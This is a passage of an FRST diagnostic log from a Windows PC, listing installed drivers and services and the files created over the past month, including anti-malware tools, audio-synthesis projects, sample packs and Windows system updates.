R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [107496 2018-07-17] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
R3 FocusriteUSB; C:\WINDOWS\System32\drivers\FocusriteUSB.sys [96400 2018-01-09] (Focusrite Audio Engineering Ltd. -> Focusrite Audio Engineering Ltd.)
R3 FocusriteUSBAudio; C:\WINDOWS\system32\drivers\FocusriteUSBAudio.sys [54416 2018-01-09] (Focusrite Audio Engineering Ltd. -> Focusrite Audio Engineering Ltd.)
R3 FocusriteUSBMidi; C:\WINDOWS\system32\drivers\FocusriteUSBMidi.sys [46224 2018-01-09] (Focusrite Audio Engineering Ltd. -> Focusrite Audio Engineering Ltd.)
R3 FocusriteUSBSwRoot; C:\WINDOWS\System32\drivers\FocusriteUSBSwRoot.sys [97936 2018-01-09] (Focusrite Audio Engineering Ltd. -> Focusrite Audio Engineering Ltd.)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [20936 2019-02-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [275232 2019-06-09] (Malwarebytes Corporation -> Malwarebytes)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [954368 2017-04-12] (Realtek Semiconductor Corp. -> Realtek )
R3 RtkBtFilter; C:\WINDOWS\system32\DRIVERS\RtkBtfilter.sys [715232 2017-05-20] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation)
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [418784 2016-10-27] (Realtek Semiconductor Corp. -> Realsil Semiconductor Corporation)
R3 RTWlanE; C:\WINDOWS\system32\DRIVERS\rtwlane.sys [6813664 2017-05-19] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation )
S3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [44080 2016-09-27] (Shaul Eizikovich -> Nefarius Software Solutions)
R3 tap-tb-0901; C:\WINDOWS\System32\drivers\tap-tb-0901.sys [38656 2018-07-31] (TunnelBear, Inc. -> The OpenVPN Project)
R3 umbus; C:\WINDOWS\System32\drivers\umbus.sys [56832 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [46584 2018-09-16] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [340008 2018-09-16] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [61992 2018-09-16] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-06-09 19:51 - 2019-06-09 19:53 - 000024274 _____ C:\Users\MYMLA\Downloads\FRST.txt
2019-06-09 19:51 - 2019-06-09 19:51 - 002418176 _____ (Farbar) C:\Users\MYMLA\Downloads\FRST64.exe
2019-06-09 19:51 - 2019-06-09 19:51 - 000000000 ____D C:\FRST
2019-06-09 19:47 - 2019-06-09 19:47 - 000275232 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2019-06-09 19:45 - 2019-06-09 19:46 - 000000000 ____D C:\AdwCleaner
2019-06-09 19:44 - 2019-06-09 19:45 - 007025360 _____ (Malwarebytes) C:\Users\MYMLA\Downloads\adwcleaner_7.3.exe
2019-06-09 19:28 - 2019-06-09 19:28 - 000000000 ____D C:\Users\MYMLA\AppData\Local\mbam
2019-06-09 19:27 - 2019-06-09 19:27 - 000001919 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-06-09 19:27 - 2019-06-09 19:27 - 000000000 ____D C:\Users\MYMLA\AppData\Local\mbamtray
2019-06-09 19:27 - 2019-06-09 19:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-06-09 19:27 - 2019-06-09 19:27 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-06-09 19:27 - 2019-06-09 19:27 - 000000000 ____D C:\Program Files\Malwarebytes
2019-06-09 19:27 - 2019-02-01 12:20 - 000020936 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2019-06-09 19:27 - 2019-01-08 16:32 - 000153328 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2019-06-09 19:26 - 2019-06-09 19:27 - 063182216 _____ (Malwarebytes ) C:\Users\MYMLA\Downloads\mb3-setup-37469.37469-3.7.1.2839-1.0.586-1.0.10430.exe
2019-06-09 19:23 - 2019-06-09 19:40 - 000000000 __SHD C:\ProgramData\{DDF058D8-0F5A-412D-BDAF-9092C48AA545}
2019-06-09 14:59 - 2019-06-09 16:19 - 000000602 _____ C:\Users\MYMLA\Sawsubtr.csd
2019-06-05 20:24 - 2019-06-05 20:24 - 006626506 _____ C:\Users\MYMLA\Downloads\ToneZ_x64_1.2_Setup.zip
2019-06-05 20:13 - 2019-06-05 21:43 - 000000000 ____D C:\Users\MYMLA\Desktop\CabbagePresetTest
2019-06-04 18:41 - 2019-06-04 18:41 - 000005933 _____ C:\Users\MYMLA\AppData\Local\recently-used.xbel
2019-06-03 20:32 - 2019-06-03 20:37 - 063955387 _____ (Cabbage Audio ) C:\Users\MYMLA\Downloads\Cabbage64Setup (1).exe
2019-06-03 19:29 - 2019-06-03 19:31 - 000000852 _____ C:\Users\MYMLA\tessig.csd
2019-06-03 16:48 - 2019-06-03 16:48 - 029127185 _____ C:\Users\MYMLA\Documents\Synthart2.xcf
2019-06-03 11:35 - 2019-06-03 11:35 - 021411749 _____ C:\Users\MYMLA\Downloads\y2mate.com - _you_are_not_alone_1984_live_XOaglFya8ss_360p.mp4
2019-06-03 11:33 - 2019-06-03 11:33 - 022308621 _____ C:\Users\MYMLA\Downloads\y2mate.com - _1984_live_Cezd3oKFl_E_360p.mp4
2019-06-03 11:30 - 2019-06-03 11:31 - 065859063 _____ C:\Users\MYMLA\Downloads\y2mate.com - dancin_blue_HndZ4FF9XrM_720p.mp4
2019-06-03 11:29 - 2019-06-03 11:29 - 043861066 _____ C:\Users\MYMLA\Downloads\y2mate.com - flashin_night_good_bye_boogie_dance_3HQ-tZ00Xks_360p.mp4
2019-06-03 11:27 - 2019-06-03 11:28 - 013920527 _____ C:\Users\MYMLA\Downloads\y2mate.com - anri_cats_eye_1984avi_xOihMx9qeTw_360p.mp4
2019-06-03 10:41 - 2019-06-09 18:21 - 000000000 ____D C:\Users\MYMLA\AppData\LocalLow\BitTorrent
2019-06-02 17:31 - 2019-06-02 17:31 - 000000602 _____ C:\Users\MYMLA\test23.csd
2019-06-02 11:46 - 2019-06-02 11:46 - 013204273 _____ C:\Users\MYMLA\Documents\Synthart.xcf
2019-06-01 19:51 - 2019-06-01 19:51 - 000003426 _____ C:\Users\MYMLA\Downloads\kremlin.zip
2019-06-01 19:51 - 2019-06-01 19:51 - 000000000 ____D C:\Users\MYMLA\Downloads\kremlin
2019-06-01 12:56 - 2019-06-03 17:09 - 000000000 ____D C:\Users\MYMLA\Desktop\FMADD synth
2019-05-31 22:31 - 2019-05-31 22:31 - 000005110 _____ C:\Users\MYMLA\Fm2add.cabbage
2019-05-29 19:58 - 2019-05-29 20:04 - 000000000 ____D C:\Users\MYMLA\Downloads\Diginoiz - Magic 80s 2
2019-05-29 17:56 - 2019-06-01 12:10 - 000018095 _____ C:\Users\MYMLA\Fm2add.csd
2019-05-27 21:38 - 2019-05-27 21:38 - 000985152 _____ C:\Users\MYMLA\Downloads\Esquef2003_Article_Frequency-ZoomingARMAModelingF.pdf
2019-05-27 21:16 - 2019-05-27 21:16 - 001159095 _____ C:\Users\MYMLA\Downloads\DAFX02_Karjalainen_Valimaki_Esquef_bell-like_sounds.pdf
2019-05-27 19:13 - 2019-06-04 18:15 - 000000659 _____ C:\Users\MYMLA\test.csd
2019-05-26 15:52 - 2019-05-26 16:14 - 000000000 ____D C:\Users\MYMLA\Downloads\Zenhiser - 80's Synthwave Vol.2
2019-05-26 15:51 - 2019-05-26 17:39 - 000000000 ____D C:\Users\MYMLA\Downloads\80's Synthwave Vol. 1 - Zenhiser
2019-05-26 15:51 - 2019-05-26 15:51 - 000000000 ____D C:\Users\MYMLA\Downloads\Cymatics - Strangers Vintage Samples & Presets
2019-05-26 15:49 - 2019-05-26 17:03 - 000000000 ____D C:\Users\MYMLA\Downloads\Samplephonics - 80 s Drums
2019-05-26 15:49 - 2019-05-26 16:03 - 000000000 ____D C:\Users\MYMLA\Downloads\Samplephonics - 80's Synthwave
2019-05-26 15:48 - 2019-05-26 15:48 - 000000000 ____D C:\Users\MYMLA\Downloads\Zenhiser.Pure.80s.Hi.Hats.v1.WAV
2019-05-26 15:47 - 2019-05-26 17:50 - 000000000 ____D C:\Users\MYMLA\Downloads\Zenhiser.80s.Crush.WAV-MASCHiNE
2019-05-26 15:47 - 2019-05-26 15:47 - 000000000 ____D C:\Users\MYMLA\Downloads\SM101 - Massive 80s Sounds
2019-05-25 21:39 - 2019-05-25 21:39 - 000000000 ____D C:\Users\MYMLA\AppData\Local\CsoundQt-d-cs6
2019-05-22 20:17 - 2019-05-22 20:17 - 000584788 _____ C:\Users\MYMLA\Downloads\20.zip
2019-05-22 20:17 - 2019-05-22 20:17 - 000000000 ____D C:\Users\MYMLA\Downloads\20
2019-05-22 20:16 - 2019-05-22 20:16 - 000010773 _____ C:\Users\MYMLA\Downloads\porco-rosso-talk-about-our-old-days.mid
2019-05-20 20:09 - 2019-05-20 20:09 - 006086542 _____ ( ) C:\Users\MYMLA\Downloads\setup-kscript-editor-1.5.2.exe
2019-05-20 19:39 - 2019-05-20 19:39 - 000000000 ___HD C:\Users\MYMLA\Downloads\Family Nudism
2019-05-20 18:54 - 2019-05-27 19:49 - 000008318 _____ C:\Users\MYMLA\Desktop\Bell.csd
2019-05-20 17:10 - 2019-02-13 06:47 - 001909560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll
2019-05-19 11:49 - 2019-05-19 15:17 - 000000000 ____D C:\Users\MYMLA\Downloads\Shoko Sawada - Discography
2019-05-18 22:16 - 2019-05-18 22:16 - 000000000 ____D C:\Users\MYMLA\Downloads\Wavesfactory-Freelodica
2019-05-18 22:14 - 2019-05-18 22:15 - 093223105 _____ C:\Users\MYMLA\Downloads\Wavesfactory-Freelodica.rar
2019-05-18 21:21 - 2019-05-18 21:38 - 000023807 _____ C:\Users\MYMLA\Downloads\Whisky Wheel.knob
2019-05-18 21:17 - 2019-05-18 21:17 - 000099192 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2019-05-18 21:17 - 2019-05-18 21:17 - 000000000 ____D C:\Users\MYMLA\AppData\Roaming\Sun
2019-05-18 21:17 - 2019-05-18 21:17 - 000000000 ____D C:\Users\MYMLA\AppData\LocalLow\Sun
2019-05-18 21:17 - 2019-05-18 21:17 - 000000000 ____D C:\ProgramData\Oracle
2019-05-18 21:17 - 2019-05-18 21:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2019-05-18 21:17 - 2019-05-18 21:17 - 000000000 ____D C:\Program Files (x86)\Java
2019-05-18 21:16 - 2019-05-18 21:16 - 002043232 _____ (Oracle Corporation) C:\Users\MYMLA\Downloads\JavaSetup8u211.exe
2019-05-18 21:14 - 2019-05-18 21:38 - 000000000 ____D C:\Users\MYMLA\Downloads\JKnobMan133-exe
2019-05-18 21:13 - 2019-05-18 21:13 - 001989897 _____ C:\Users\MYMLA\Downloads\JKnobMan133-exe.zip
2019-05-18 19:39 - 2019-05-19 02:31 - 000000000 ____D C:\Users\MYMLA\Desktop\Sea Melodica
2019-05-17 20:03 - 2019-05-19 17:19 - 000000000 ____D C:\Users\MYMLA\Downloads\Lord of the Rings Trilogy BluRay Extended 1080p QEBS5 AAC51 PS3 MP4-FASM
2019-05-16 20:24 - 2019-05-18 10:32 - 000000000 ____D C:\Users\MYMLA\Downloads\Kontakt 6 NO INSTALL
2019-05-16 20:23 - 2019-05-16 20:26 - 000000000 ____D C:\Users\MYMLA\Downloads\Kontakt_604_UPDATE
2019-05-14 19:49 - 2019-05-03 13:14 - 000790208 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2019-05-14 19:49 - 2019-05-03 13:13 - 001376472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2019-05-14 19:49 - 2019-05-03 13:13 - 000396088 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2019-05-14 19:49 - 2019-05-03 12:55 - 000123392 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2019-05-14 19:49 - 2019-05-03 12:54 - 000177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2019-05-14 19:49 - 2019-05-03 12:52 - 000119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2019-05-14 19:49 - 2019-05-03 12:51 - 003613696 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2019-05-14 19:49 - 2019-05-03 12:51 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2019-05-14 19:49 - 2019-05-03 12:50 - 004054528 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2019-05-14 19:49 - 2019-05-03 12:50 - 001663488 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2019-05-14 19:49 - 2019-05-03 12:49 - 001288704 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2019-05-14 19:49 - 2019-05-03 12:49 - 000488448 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2019-05-14 19:49 - 2019-05-03 12:49 - 000210944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2019-05-14 19:49 - 2019-05-03 12:43 - 001027008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2019-05-14 19:49 - 2019-05-03 12:43 - 000662328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2019-05-14 19:49 - 2019-05-03 12:30 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2019-05-14 19:49 - 2019-05-03 12:30 - 000098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2019-05-14 19:49 - 2019-05-03 12:28 - 002882048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2019-05-14 19:49 - 2019-05-03 12:28 - 000089600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2019-05-14 19:49 - 2019-05-03 12:27 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE
2019-05-14 19:49 - 2019-05-03 12:26 - 000425472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2019-05-14 19:49 - 2019-05-03 12:25 - 004055040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2019-05-14 19:49 - 2019-05-03 12:25 - 001471488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2019-05-14 19:49 - 2019-05-03 07:43 - 000177128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys
2019-05-14 19:49 - 2019-05-03 07:36 - 001035256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2019-05-14 19:49 - 2019-05-03 07:34 - 000159864 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2019-05-14 19:49 - 2019-05-03 07:33 - 005625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2019-05-14 19:49 - 2019-05-03 07:33 - 001219896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2019-05-14 19:49 - 2019-05-03 07:33 - 001027384 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2019-05-14 19:49 - 2019-05-03 07:33 - 000709720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2019-05-14 19:49 - 2019-05-03 07:33 - 000568104 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2019-05-14 19:49 - 2019-05-03 07:33 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2019-05-14 19:49 - 2019-05-03 07:33 - 000076088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2019-05-14 19:49 - 2019-05-03 07:33 - 000063072 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptdll.dll
2019-05-14 19:49 - 2019-05-03 07:32 - 000793640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2019-05-14 19:49 - 2019-05-03 07:32 - 000776784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2019-05-14 19:49 - 2019-05-03 07:32 - 000493880 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2019-05-14 19:49 - 2019-05-03 07:32 - 000438984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2019-05-14 19:49 - 2019-05-03 07:32 - 000209208 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2019-05-14 19:49 - 2019-05-03 07:32 - 000170296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2019-05-14 19:49 - 2019-05-03 07:32 - 000164664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wfplwfs.sys
2019-05-14 19:49 - 2019-05-03 07:31 - 009084432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-05-14 19:49 - 2019-05-03 07:31 - 007519888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-05-14 19:49 - 2019-05-03 07:31 - 007436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2019-05-14 19:49 - 2019-05-03 07:31 - 002811192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2019-05-14 19:49 - 2019-05-03 07:31 - 002771256 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-05-14 19:49 - 2019-05-03 07:31 - 001459328 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2019-05-14 19:49 - 2019-05-03 07:31 - 001260480 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2019-05-14 19:49 - 2019-05-03 07:31 - 001141224 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2019-05-14 19:49 - 2019-05-03 07:31 - 001098064 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2019-05-14 19:49 - 2019-05-03 07:31 - 000983632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2019-05-14 19:49 - 2019-05-03 07:31 - 000545808 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2019-05-14 19:49 - 2019-05-03 07:31 - 000412984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2019-05-14 19:49 - 2019-05-03 07:31 - 000115728 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdnet.dll
2019-05-14 19:49 - 2019-05-03 07:20 - 000434704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe
2019-05-14 19:49 - 2019-05-03 07:20 - 000384976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2019-05-14 19:49 - 2019-05-03 07:20 - 000192016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2019-05-14 19:49 - 2019-05-03 07:20 - 000146920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2019-05-14 19:49 - 2019-05-03 07:19 - 006043712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2019-05-14 19:49 - 2019-05-03 07:19 - 000665224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2019-05-14 19:49 - 2019-05-03 07:19 - 000056288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptdll.dll
2019-05-14 19:49 - 2019-05-03 07:18 - 006569344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2019-05-14 19:49 - 2019-05-03 07:18 - 002258640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-05-14 19:49 - 2019-05-03 07:18 - 001130568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2019-05-14 19:49 - 2019-05-03 07:12 - 025855488 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2019-05-14 19:49 - 2019-05-03 07:10 - 022017024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2019-05-14 19:49 - 2019-05-03 07:05 - 022716416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-05-14 19:49 - 2019-05-03 07:02 - 019401216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-05-14 19:49 - 2019-05-03 07:02 - 004866048 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2019-05-14 19:49 - 2019-05-03 07:01 - 008189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2019-05-14 19:49 - 2019-05-03 07:00 - 006661632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2019-05-14 19:49 - 2019-05-03 07:00 - 003400192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2019-05-14 19:49 - 2019-05-03 07:00 - 000120832 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-kernel-processor-power-events.dll
2019-05-14 19:49 - 2019-05-03 07:00 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2019-05-14 19:49 - 2019-05-03 06:59 - 007593472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2019-05-14 19:49 - 2019-05-03 06:59 - 005788672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2019-05-14 19:49 - 2019-05-03 06:59 - 003710976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2019-05-14 19:49 - 2019-05-03 06:59 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2019-05-14 19:49 - 2019-05-03 06:59 - 000514560 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2019-05-14 19:49 - 2019-05-03 06:59 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2019-05-14 19:49 - 2019-05-03 06:59 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2019-05-14 19:49 - 2019-05-03 06:59 - 000154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2019-05-14 19:49 - 2019-05-03 06:58 - 002175488 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2019-05-14 19:49 - 2019-05-03 06:58 - 001708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll
2019-05-14 19:49 - 2019-05-03 06:58 - 001361408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll
2019-05-14 19:49 - 2019-05-03 06:58 - 000894464 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2019-05-14 19:49 - 2019-05-03 06:58 - 000726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2019-05-14 19:49 - 2019-05-03 06:58 - 000462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2019-05-14 19:49 - 2019-05-03 06:58 - 000074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dtdump.exe
2019-05-14 19:49 - 2019-05-03 06:57 - 001826816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2019-05-14 19:49 - 2019-05-03 06:57 - 001560576 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2019-05-14 19:49 - 2019-05-03 06:57 - 001549824 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2019-05-14 19:49 - 2019-05-03 06:57 - 001295872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2019-05-14 19:49 - 2019-05-03 06:57 - 000808448 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2019-05-14 19:49 - 2019-05-03 06:57 - 000608768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2019-05-14 19:49 - 2019-05-03 06:57 - 000561152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2019-05-14 19:49 - 2019-05-03 06:56 - 005350912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2019-05-14 19:49 - 2019-05-03 06:56 - 001803776 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-05-14 19:49 - 2019-05-03 06:56 - 000773632 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2019-05-14 19:49 - 2019-05-03 06:56 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2019-05-14 19:49 - 2019-05-03 06:56 - 000333824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2019-05-14 19:49 - 2019-05-03 06:55 - 003090432 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2019-05-14 19:49 - 2019-05-03 06:55 - 002166784 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2019-05-14 19:49 - 2019-05-03 06:55 - 000659968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2019-05-14 19:49 - 2019-05-03 06:54 - 004929024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2019-05-14 19:49 - 2019-05-03 06:54 - 001628672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-05-14 19:49 - 2019-05-03 06:54 - 001097728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2019-05-14 19:49 - 2019-05-03 06:54 - 000961024 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2019-05-14 19:49 - 2019-05-03 06:54 - 000845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2019-05-14 19:49 - 2019-05-03 06:54 - 000778752 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2019-05-14 19:49 - 2019-05-03 06:54 - 000776192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2019-05-14 19:49 - 2019-05-03 06:54 - 000669184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2019-05-14 19:49 - 2019-05-03 06:54 - 000667136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2019-05-14 19:49 - 2019-05-03 06:54 - 000543744 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2019-05-14 19:49 - 2019-05-03 06:54 - 000535552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2019-05-14 19:49 - 2019-05-03 06:54 - 000507392 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2019-05-14 19:49 - 2019-05-03 06:54 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2019-05-14 19:49 - 2019-05-03 06:53 - 000204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelppm.sys
2019-05-14 19:49 - 2019-05-03 06:53 - 000186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdk8.sys
2019-05-14 19:49 - 2019-05-03 06:53 - 000184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdppm.sys
2019-05-14 19:49 - 2019-05-03 06:53 - 000181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\processr.sys
2019-05-14 19:49 - 2019-05-03 05:38 - 000001310 _____ C:\WINDOWS\system32\tcbres.wim
2019-05-14 19:49 - 2019-04-23 08:13 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MixedRealityCapture.dll
2019-05-14 19:49 - 2019-04-23 07:14 - 000868864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MixedRealityCapture.dll
2019-05-14 19:49 - 2019-04-19 11:55 - 001634920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2019-05-14 19:49 - 2019-04-19 11:54 - 000720200 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2019-05-14 19:49 - 2019-04-19 11:40 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2019-05-14 19:49 - 2019-04-19 11:39 - 012754944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
